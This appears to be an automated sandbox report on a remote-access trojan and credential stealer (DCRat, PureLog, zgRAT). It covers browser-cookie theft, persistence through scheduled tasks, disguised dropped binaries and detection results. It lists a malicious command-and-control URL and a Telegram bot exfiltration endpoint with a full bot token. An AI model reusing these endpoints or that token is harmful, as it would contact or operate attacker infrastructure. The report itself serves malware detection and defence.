Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Recovery\opHipgZM6eS.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000000.00000002.1766711980.00000000132C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SfbAu0ICZn.exe PID: 7096, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: SfbAu0ICZn.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SfbAu0ICZn.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1656792148.0000000000B32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: C:\Recovery\opHipgZM6eS.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\ctfmon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: SfbAu0ICZn.exe, type: SAMPLE
Source: Yara match	File source: 0.0.SfbAu0ICZn.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Recovery\opHipgZM6eS.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\CbsTemp\ctfmon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	124 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	133 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SfbAu0ICZn.exe	75%	Virustotal		Browse
SfbAu0ICZn.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
SfbAu0ICZn.exe	100%	Avira	TR/Spy.Agent.yysoz

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\IoSQRIuD.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Recovery\opHipgZM6eS.exe	100%	Avira	TR/Spy.Agent.yysoz
C:\Users\user\Desktop\OUqOeHbA.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	100%	Avira	TR/Spy.Agent.yysoz
C:\Recovery\RuntimeBroker.exe	100%	Avira	TR/Spy.Agent.yysoz
C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	100%	Avira	TR/Spy.Agent.yysoz
C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\RuntimeBroker.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\opHipgZM6eS.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\DsQyKcEJ.log	8%	ReversingLabs
C:\Users\user\Desktop\IoSQRIuD.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\OUqOeHbA.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RZKXfllq.log	25%	ReversingLabs
C:\Users\user\Desktop\YLtwtTHn.log	25%	ReversingLabs
C:\Users\user\Desktop\evmDrQmW.log	17%	ReversingLabs
C:\Users\user\Desktop\hyhVOtKH.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\mdQBMGyp.log	17%	ReversingLabs
C:\Users\user\Desktop\oeGTbsrD.log	8%	ReversingLabs
C:\Users\user\Desktop\ySkKLEmm.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\CbsTemp\ctfmon.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
https://.AppV.	0%	Avira URL Cloud	safe
http://www.micft.cosof	0%	Avira URL Cloud	safe
http://047506cm.nyanyash.ru/externalvideopythonpollTracktemp.php	100%	Avira URL Cloud	malware
http://crl.m	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ipinfo.io	34.117.59.81	true	false	high
047506cm.nyanyash.ru	104.21.3.239	true	true	unknown
api.telegram.org	149.154.167.220	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
tse1.mm.bing.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://047506cm.nyanyash.ru/externalvideopythonpollTracktemp.php	true	Avira URL Cloud: malware	unknown
https://ipinfo.io/country	false		high
https://api.telegram.org/bot7879148704:AAFNNtpKlCmwPR7xOBNG2DRo_nYZIdzpXqk/sendPhoto	false		high
https://ipinfo.io/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000013.00000002.3027055525.0000022F14844000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2810868073.0000026F10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2996178084.000001EA14944000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3072476405.000002385EA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2965146623.0000019424315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
http://www.micft.cosof	powershell.exe, 0000001C.00000002.3280691728.000001FA6FDDC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	SfbAu0ICZn.exe, 00000000.00000002.1721457571.00000000016D2000.00000002.00000001.01000000.00000000.sdmp, DsQyKcEJ.log.0.dr	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000013.00000002.1850990457.0000022F049FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA04AF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384EBC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194144C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
https://.AppV.	powershell.exe, 0000001A.00000002.3316254602.000001942C68E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 00000032.00000003.1876329348.000001871B6A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B6F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000003.1876329348.000001871B707000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
https://www.ecosia.org/newtab/	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
https://g.live.com/odclientsettings/Prod.C:	svchost.exe, 00000032.00000003.1876329348.000001871B71A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m	powershell.exe, 00000014.00000002.3311542989.0000026F7EAF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000013.00000002.1850990457.0000022F049FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA04AF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384EBC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194144C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00228000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000013.00000002.3027055525.0000022F14844000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2810868073.0000026F10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2996178084.000001EA14944000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3072476405.000002385EA14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2965146623.0000019424315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2788998585.000001FA10076000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000013.00000002.1850990457.0000022F047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384E9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194142A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SfbAu0ICZn.exe, 00000000.00000002.1721991352.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1850990457.0000022F047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1834361095.0000026F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1846240791.000001EA048D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1849712959.000002384E9A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1850541934.00000194142A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1833856848.000001FA00001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mQzQ4XHZc6.49.dr, Yfo8s4NEke.49.dr, 4naxUPWdGG.49.dr, bUeYLGgXV5.49.dr, 4NBJs5voeY.49.dr, PO5ONxppyL.49.dr, 3dbAWGW9h7.49.dr, 1SvCRVOPwV.49.dr, 6kfkRmsgX2.49.dr, derEfIlRqt.49.dr, NgbUkyH0xo.49.dr, HnGMWpdwJq.49.dr, Skfjp2CPGz.49.dr, czyYxNNRaR.49.dr, ZFstMKPSa3.49.dr, YkFrdKNqKZ.49.dr, Hi95mJXSpp.49.dr, lbj03G8MyS.49.dr, GJh9KjzV25.49.dr, NmtdmcJ0oS.49.dr, CN0PXIgl3Z.49.dr	false		high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000032.00000003.1876329348.000001871B6C2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	powershell.exe, 0000001C.00000002.3254657919.000001FA6FBA0000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
34.117.59.81	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.21.3.239	047506cm.nyanyash.ru	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1629678
Start date and time:	2025-03-05 02:05:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SfbAu0ICZn.exe renamed because original name is a hash value
Original Sample Name:	ba5406a838158dfaba199f47dda74695.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@43/297@4/4
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 2.19.122.40, 2.19.122.26, 4.175.87.197, 13.107.246.60, 20.190.159.129, 20.223.36.55, 20.199.58.43
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, e16604.f.akamaiedge.net, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target SfbAu0ICZn.exe, PID 7096 because it is empty
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:06:21	Task Scheduler	Run new task: ctfmon path: "C:\Windows\CbsTemp\ctfmon.exe"
01:06:22	Task Scheduler	Run new task: ctfmonc path: "C:\Windows\CbsTemp\ctfmon.exe"
01:06:22	Task Scheduler	Run new task: lYlhyYPN9gkdqQ path: "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe"
01:06:22	Task Scheduler	Run new task: lYlhyYPN9gkdqQl path: "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe"
01:06:23	Task Scheduler	Run new task: opHipgZM6eS path: "C:\Recovery\opHipgZM6eS.exe"
01:06:23	Task Scheduler	Run new task: opHipgZM6eSo path: "C:\Recovery\opHipgZM6eS.exe"
01:06:23	Task Scheduler	Run new task: RuntimeBroker path: "C:\Recovery\RuntimeBroker.exe"
01:06:23	Task Scheduler	Run new task: RuntimeBrokerR path: "C:\Recovery\RuntimeBroker.exe"
01:06:23	Task Scheduler	Run new task: SfbAu0ICZn path: "C:\Users\user\Desktop\SfbAu0ICZn.exe"
01:06:23	Task Scheduler	Run new task: SfbAu0ICZnS path: "C:\Users\user\Desktop\SfbAu0ICZn.exe"
01:06:23	Task Scheduler	Run new task: TMqwtuekPHF path: "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe"
01:06:24	Task Scheduler	Run new task: TMqwtuekPHFT path: "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe"
20:06:23	API Interceptor	178x Sleep call for process: powershell.exe modified
20:06:37	API Interceptor	2738610x Sleep call for process: opHipgZM6eS.exe modified
20:06:38	API Interceptor	2x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	jjohnson@bagtoearth.com-Paymentreceipt.htm	Get hash	malicious	HTMLPhisher	Browse
	rarrivalnotice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	50% deposit's payment advice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rPurchaseOrder-25-1201.exe	Get hash	malicious	Snake Keylogger	Browse
	Verger Doc.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	2raqmphRKT.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer	Browse
	Payment_Advice.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	HSBC_USD31,073.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	rhsvjqRoEV.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, XWorm	Browse
	BGgPmeaRBs.exe	Get hash	malicious	Xmrig	Browse
34.117.59.81	SecuriteInfo.com.Win64.Evo-gen.26839.29040.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win64.Evo-gen.26839.29040.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	QkRFz2sau5.exe	Get hash	malicious	Amadey, AsyncRAT, LiteHTTP Bot, LummaC Stealer, PureLog Stealer	Browse	ipinfo.io/ip
	0t8amSU3vd.exe	Get hash	malicious	CryptoWall, TrojanRansom	Browse	ipinfo.io/ip
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	ipinfo.io/json
	Code%20Send%20meta%20Discord%20EXE.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	idl57nk7gk.exe	Get hash	malicious	Neshta	Browse	ipinfo.io/json
	FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	172.104.150.66.ps1	Get hash	malicious	Unknown	Browse	ipinfo.io/json

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ax-0001.ax-msedge.net	http://imagekit.io/public/share/jedyb8c6o/3d23bf1bd85df6054e8a36ee022113464d68972afd38ce381e64fdf1933d3f92b711d4946c66a4059145e4bf1ff2ccffc63e817dd4e19d81d6140278ab6c7b542101c8bd792e064f02c249b7b97286a6	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	150.171.28.10
	https://app.hellobonsai.com/link/c8063f67300b3cd93813c8bb88f58154?utm_campaign=send_to_client&utm_content=primary-btn&utm_medium=email&utm_source=proposals	Get hash	malicious	Unknown	Browse	150.171.28.10
	09.msi	Get hash	malicious	RedLine	Browse	150.171.28.10
	674219467483TNVZGETYglqnPIZJADRO.dll	Get hash	malicious	Unknown	Browse	150.171.28.10
	GELEPLLV.msi	Get hash	malicious	RedLine, SectopRAT	Browse	150.171.28.10
	hhh.jpg.exe	Get hash	malicious	Unknown	Browse	150.171.28.10
	Neles Changer v 1.0.exe	Get hash	malicious	PureLog Stealer	Browse	150.171.27.10
	http://client.yg5sjx5kzy.com	Get hash	malicious	Unknown	Browse	150.171.28.10
